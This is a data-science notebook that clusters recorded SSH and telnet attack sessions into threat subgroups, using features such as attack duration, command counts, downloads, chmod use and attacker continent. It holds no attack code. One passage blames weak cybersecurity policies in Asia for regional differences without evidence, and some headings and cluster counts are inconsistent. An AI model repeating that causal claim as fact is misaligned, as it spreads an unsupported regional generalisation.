# Second Clustering Stage
This notebook contains the code to create the second clustering stage. Here we focus in perform a further classification in clusters 1 and 2 given by the first stage. We extract features of the data to perform the clustering using K-prototypes and FAMD+K-means.

In [None]:
# Required imports 

# Utils functions
from utils import *

# Ignore warnings
import warnings
warnings.filterwarnings('ignore')

# General imports 
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from tqdm import tqdm
from collections import Counter

# ML imports
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.preprocessing import MinMaxScaler
from kmodes.kprototypes import KPrototypes
from sklearn.cluster import KMeans

# Dimensionality reduction 
import prince

# Feature extraction

Let us extract numerical and categorical data.  Then, we'll experiment with various clustering algorithms. Features we consider are:
+ Attack duration in seconds
+ Length and number of commands introduced by the cyberattacker
+ Boolean variable showing if a link is downloaded by the attackant or not
+ Boolean variable showing if chmod is used by the attackant or not
+ Length of password
+ Protocol variable
+ Host port and Peer port
+ Protocol version is not useful, there is more telnet than SSH and the version is only available for telnet
+ Attacker location

In clusters1 and clusters2 are found the majority of attacks via telnet!! In total there are 183.037 and in cluster1 and cluster2 there are 182.891. We can deduce that more threatining attacks are perform with telnet.

In [None]:
# Read csv file
df = pd.read_csv("../Data/Cluster_data_wlabels.csv")

# Consider data just in cluster 1 and 2
df = df[df['spectral_cluster'].isin([1, 2])]

# Command normalization
df = command_normalization(df)

# Feature extraction
df_features = feature_extraction(df)

# Divide the data in two dataframes, one for each cluster
df_features1 = df_features[df_features['spectral_clustering'] == 1]
df_features2 = df_features[df_features['spectral_clustering'] == 2]
df_features1 = df_features1.drop(['spectral_clustering'], axis =1)
df_features2 = df_features2.drop(['spectral_clustering'], axis =1)

## Feature correlation
Plot the correlation matrix for every dataframe to observe correlated features.

In [None]:
# Correlation matrix for features from the first cluster
plot_corr_mat(df_features1)

# Correlation matrix for features from the second cluster
plot_corr_mat(df_features2)

In [None]:
# Drop correlated features
df_features1 = df_features1.drop(['host_port','length_command','peer_port'], axis = 1)
df_features2 = df_features2.drop(['host_port','length_command','peer_port'], axis = 1)

# Clustering data in the first group (Intermediate threat)

## K-prototypes

In [None]:
# Scale the numerical data
scaler = MinMaxScaler()
df_features1_scaled = df_features1.copy()
df_features1_scaled[['attack_duration','wcount_command','length_password']] = scaler.fit_transform(df_features1_scaled.drop(['link_download','chmod_found', 'protocol','continent_attacker'], axis=1))

n_clusters selection using elbow plot

In [None]:
#Elbow plot with cost 
costs = []
categorical_columns = [2,3,5,6]

for k in tqdm(range(2, 10)):
    kproto = KPrototypes(n_clusters=k, init='Huang', gamma=None, n_init=1, random_state=42)
    kproto.fit(df_features1_scaled, categorical=categorical_columns)
    costs.append(kproto.cost_)
# Elbow plot
plt.figure(1 , figsize = (15 ,6))
plt.plot(np.arange(2 , 10) , costs , 'o')
plt.plot(np.arange(2 , 10) , costs , '-' , alpha = 0.5)
plt.xlabel('Number of Clusters')
plt.ylabel('Distortion')
plt.title('Elbow Plot')
plt.show()

3 clusters seems a good choice by examinig the elbow plot!

In [None]:
# Fit and predict for k = 3
kproto = KPrototypes(n_clusters=3, init='Huang', gamma=None, n_init=1, random_state=42)
clusters_kproto1 = kproto.fit_predict(df_features1_scaled, categorical=categorical_columns)

# Append the clusters to the dataset
df_features1['kproto_cluster'] = clusters_kproto1

### K-prototypes visualization

In [None]:
# Clustering distribution for k-prototypes
label_counts = Counter(clusters_kproto1)
labels, counts = zip(*label_counts.items())

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Cluster Distribution', fontsize=16, fontweight='bold')

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)


# Set the x-ticks to show only the number of cluster
ax.set_xticks([0, 1, 2])

# Show the plot
plt.tight_layout()
plt.show()

In [None]:
# Multiple plots, clustering visualization
cluster_visualization(df_features1,'kproto_cluster')

In [None]:
# Continent count per cluster
grouped = df_features1.groupby(['kproto_cluster', 'continent_attacker']).size().unstack(fill_value=0)
ax = grouped.plot(kind='bar', stacked=True, colormap='tab10')
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Attacker Continent Distribution by cluster', fontsize=16, fontweight='bold')
plt.legend(title='Continent Code', title_fontsize=12,loc='upper left', bbox_to_anchor=(1, 1))
plt.grid(axis='y', linestyle='--', alpha=0.6)
plt.show()

We can observe how cluster 1 is mainly governed by EU while clusters 0 and 2 by Asia. Examining the previous plot, one notice that cluster 1 is the one that lasts the least (attack duration) and it is not downloading and executing as much files as the first cluster 0 (inside this intermediate level, is the less threatened). This is possiblty due to the weak policies of cybersecurity in Asia, leaving there the necessariry permissions to execute and download what they want, without any regulation.

## FAMD & K-means

In [None]:
# No scale is needed, is inside FAMD
# Look for optimal n_components (Scree plot)
famd = prince.FAMD(n_components=(len(df_features1.columns) - 1), n_iter=5,
                   copy=True, check_input=True,random_state=42)
famd.fit(df_features1.drop(['kproto_cluster'],axis=1))

# Scree plot
eigenvalues = famd.eigenvalues_
plt.figure(1 , figsize = (15 ,6))
plt.plot(range(1, len(eigenvalues) + 1), eigenvalues, marker='o')
plt.plot(range(1, len(eigenvalues) + 1) , eigenvalues , '-' , alpha = 0.5)
plt.title("Scree Plot")
plt.xlabel("Number of Components")
plt.ylabel("Eigenvalues")
plt.show()

Let us keep components until we reach the 75% of the total variance.

In [None]:
cumulative_variance = np.cumsum(famd.eigenvalues_ / sum(famd.eigenvalues_))
n_components = np.argmax(cumulative_variance >= 0.75) + 1
print('Optimal number of components using the 3/4 rule:',n_components)
print('Fitting FAMD with n_components = 5....')
# Fit FAMD for n_components = 5
famd = prince.FAMD(n_components=5, n_iter=5,
                   copy=True, check_input=True,random_state=42)
famd.fit(df_features1.drop(['kproto_cluster'],axis=1))
df_features1_famdkmeans = famd.row_coordinates(df_features1.drop(['kproto_cluster'],axis=1))

Now we can perform K-means clustering to this data.

In [None]:
# Scaling the data
scaler = MinMaxScaler(feature_range=(-1,1)) # since we have negative and positive values
df_features1_famdkmeans_scaled = scaler.fit_transform(df_features1_famdkmeans)

Choose the optimal number of clusters for K-means using the elbow plot again.

In [None]:
# Choosing the number of clusters for k-means
inertia = []
for k in tqdm(range(1, 10)):
    km = KMeans(n_clusters = k ,init='k-means++',  random_state= 42  , algorithm='elkan')
    km.fit(df_features1_famdkmeans_scaled )
    inertia.append(km.inertia_)
# Elbow plot
plt.figure(1 , figsize = (15 ,6))
plt.plot(np.arange(1 , 10) , inertia , 'o')
plt.plot(np.arange(1 , 10) , inertia , '-' , alpha = 0.5)
plt.xlabel('Number of Clusters') , plt.ylabel('Inertia')
plt.show()

2 or 3 could be a reasonable choice in this case. Let us choose 3 to win consistence with the previous method and have a better comparison.

In [None]:
# Fit again for k=3
km = KMeans(n_clusters = 3 ,init='k-means++',  random_state= 42  , algorithm='elkan')
km.fit(df_features1_famdkmeans_scaled)
clusters_kmeans1 = km.labels_
# Append cluster labels to the dataframe
df_features1['kmeans_cluster'] = clusters_kmeans1

### FAMD & K-means visualization

In [None]:
# Clustering distribution for k-prototypes
label_counts = Counter(clusters_kmeans1)
labels, counts = zip(*label_counts.items())

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Cluster Distribution', fontsize=16, fontweight='bold')

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)


# Set the x-ticks to show only the number of cluster
ax.set_xticks([0, 1, 2])

# Show the plot
plt.tight_layout()
plt.show()

In [None]:
cluster_visualization(df_features1,'kmeans_cluster')

In [None]:
# Continent count per cluster
grouped = df_features1.groupby(['kmeans_cluster', 'continent_attacker']).size().unstack(fill_value=0)
ax = grouped.plot(kind='bar', stacked=True, colormap='tab10')
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Attacker Continent Distribution by cluster', fontsize=16, fontweight='bold')
plt.legend(title='Continent Code', title_fontsize=12,loc='upper left', bbox_to_anchor=(1, 1))
plt.grid(axis='y', linestyle='--', alpha=0.6)
plt.show()

Worst results than K-prototypes.

# Clustering data in the first group (Intermediate threat)

## K-prototypes

In [None]:
# Scale the numerical data
scaler = MinMaxScaler()
df_features2_scaled = df_features2.copy()
df_features2_scaled[['attack_duration','wcount_command','length_password']] = scaler.fit_transform(df_features2_scaled.drop(['link_download','chmod_found', 'protocol','continent_attacker'], axis=1))

n_clusters selection using elbow plot

In [None]:
#Elbow plot with cost 
costs = []
categorical_columns = [2,3,5,6]

for k in tqdm(range(2, 10)):
    kproto = KPrototypes(n_clusters=k, init='Huang', gamma=None, n_init=1, random_state=42)
    kproto.fit(df_features2_scaled, categorical=categorical_columns)
    costs.append(kproto.cost_)
# Elbow plot
plt.figure(1 , figsize = (15 ,6))
plt.plot(np.arange(2 , 10) , costs , 'o')
plt.plot(np.arange(2 , 10) , costs , '-' , alpha = 0.5)
plt.xlabel('Number of Clusters')
plt.ylabel('Distortion')
plt.title('Elbow Plot')
plt.show()

4 clusters seems a good choice by examining the elbow plot!

In [None]:
# Fit and predict for k = 4
kproto = KPrototypes(n_clusters=4, init='Huang', gamma=None, n_init=1, random_state=42)
clusters_kproto2 = kproto.fit_predict(df_features2_scaled, categorical=categorical_columns)

# Append the clusters to the dataset
df_features2['kproto_cluster'] = clusters_kproto2

### K-prototypes visualization

In [None]:
# Clustering distribution for k-prototypes
label_counts = Counter(clusters_kproto2)
labels, counts = zip(*label_counts.items())

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Cluster Distribution', fontsize=16, fontweight='bold')

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)


# Set the x-ticks to show only the number of cluster
ax.set_xticks([0, 1, 2])

# Show the plot
plt.tight_layout()
plt.show()

In [None]:
# Multiple plots, clustering visualization
cluster_visualization(df_features2,'kproto_cluster')

In [None]:
# Continent count per cluster
grouped = df_features2.groupby(['kproto_cluster', 'continent_attacker']).size().unstack(fill_value=0)
ax = grouped.plot(kind='bar', stacked=True, colormap='tab10')
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Attacker Continent Distribution by cluster', fontsize=16, fontweight='bold')
plt.legend(title='Continent Code', title_fontsize=12,loc='upper left', bbox_to_anchor=(1, 1))
plt.grid(axis='y', linestyle='--', alpha=0.6)
plt.show()

Four different clusters are created in this high threat level. Observe that cluster 3,the biggeest cluster, mainly governed by EU is the one that lasts the least (attack duration) and coincides with the one that download more files but withuot any executation. Again, inside this high threat level, this is the less threatened group, in comparison with the others, in which files are donwloaded and executed with permissions.

## FAMD & K-means

In [None]:
# No scale is needed, is inside FAMD
# Look for optimal n_components (Scree plot)
famd = prince.FAMD(n_components=(len(df_features2.columns) - 1), n_iter=5,
                   copy=True, check_input=True,random_state=42)
famd.fit(df_features2.drop(['kproto_cluster'],axis=1))

# Scree plot
eigenvalues = famd.eigenvalues_
plt.figure(1 , figsize = (15 ,6))
plt.plot(range(1, len(eigenvalues) + 1), eigenvalues, marker='o')
plt.plot(range(1, len(eigenvalues) + 1) , eigenvalues , '-' , alpha = 0.5)
plt.title("Scree Plot")
plt.xlabel("Number of Components")
plt.ylabel("Eigenvalues")
plt.show()

Let us keep components until we reach 75% of the total variance.

In [None]:
cumulative_variance = np.cumsum(famd.eigenvalues_ / sum(famd.eigenvalues_))
n_components = np.argmax(cumulative_variance >= 0.75) + 1
print('Optimal number of components using the 3/4 rule:',n_components)
print('Fitting FAMD with n_components = 5....')
# Fit FAMD for n_components = 5
famd = prince.FAMD(n_components=5, n_iter=5,
                   copy=True, check_input=True,random_state=42)
famd.fit(df_features2.drop(['kproto_cluster'],axis=1))
df_features2_famdkmeans = famd.row_coordinates(df_features2.drop(['kproto_cluster'],axis=1))

Now we can perform K-means clustering to this data.

In [None]:
# Scaling the data
scaler = MinMaxScaler(feature_range=(-1,1)) # since we have negative and positive values
df_features2_famdkmeans_scaled = scaler.fit_transform(df_features2_famdkmeans)

Choose the optimal number of clusters using the elbow plot

In [None]:
# Choosing the number of clusters for k-means
inertia = []
for k in tqdm(range(1, 10)):
    km = KMeans(n_clusters = k ,init='k-means++',  random_state= 42  , algorithm='elkan')
    km.fit(df_features2_famdkmeans_scaled )
    inertia.append(km.inertia_)
# Elbow plot
plt.figure(1 , figsize = (15 ,6))
plt.plot(np.arange(1 , 10) , inertia , 'o')
plt.plot(np.arange(1 , 10) , inertia , '-' , alpha = 0.5)
plt.xlabel('Number of Clusters') , plt.ylabel('Inertia')
plt.show()

2 or 3 could be a reasonable choice in this case. Let us choose 4 to win consistence with the previous method and have a better comparison.

In [None]:
# Fit again for k=4
km = KMeans(n_clusters = 4 ,init='k-means++',  random_state= 42  , algorithm='elkan')
km.fit(df_features2_famdkmeans_scaled)
clusters_kmeans2 = km.labels_
# Append cluster labels to the dataframe
df_features2['kmeans_cluster'] = clusters_kmeans2

### FAMD & K-means visualization

In [None]:
# Clustering distribution for k-prototypes
label_counts = Counter(clusters_kmeans2)
labels, counts = zip(*label_counts.items())

# Create a figure and axes for the bar chart
fig, ax = plt.subplots(figsize=(8, 5))

# Customize the bar chart appearance
ax.bar(labels, counts, color='skyblue', edgecolor='navy', alpha=0.7)
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Cluster Distribution', fontsize=16, fontweight='bold')

# Add grid lines for better readability
ax.grid(axis='y', linestyle='--', alpha=0.6)


# Set the x-ticks to show only the number of cluster
ax.set_xticks([0, 1, 2, 3])

# Show the plot
plt.tight_layout()
plt.show()

In [None]:
cluster_visualization(df_features2,'kmeans_cluster')

In [None]:
# Continent count per cluster
grouped = df_features2.groupby(['kmeans_cluster', 'continent_attacker']).size().unstack(fill_value=0)
ax = grouped.plot(kind='bar', stacked=True, colormap='tab10')
ax.set_xlabel('Cluster', fontsize=14)
ax.set_ylabel('Count', fontsize=14)
ax.set_title('Attacker Continent Distribution by cluster', fontsize=16, fontweight='bold')
plt.legend(title='Continent Code', title_fontsize=12,loc='upper left', bbox_to_anchor=(1, 1))
plt.grid(axis='y', linestyle='--', alpha=0.6)
plt.show()

Worst results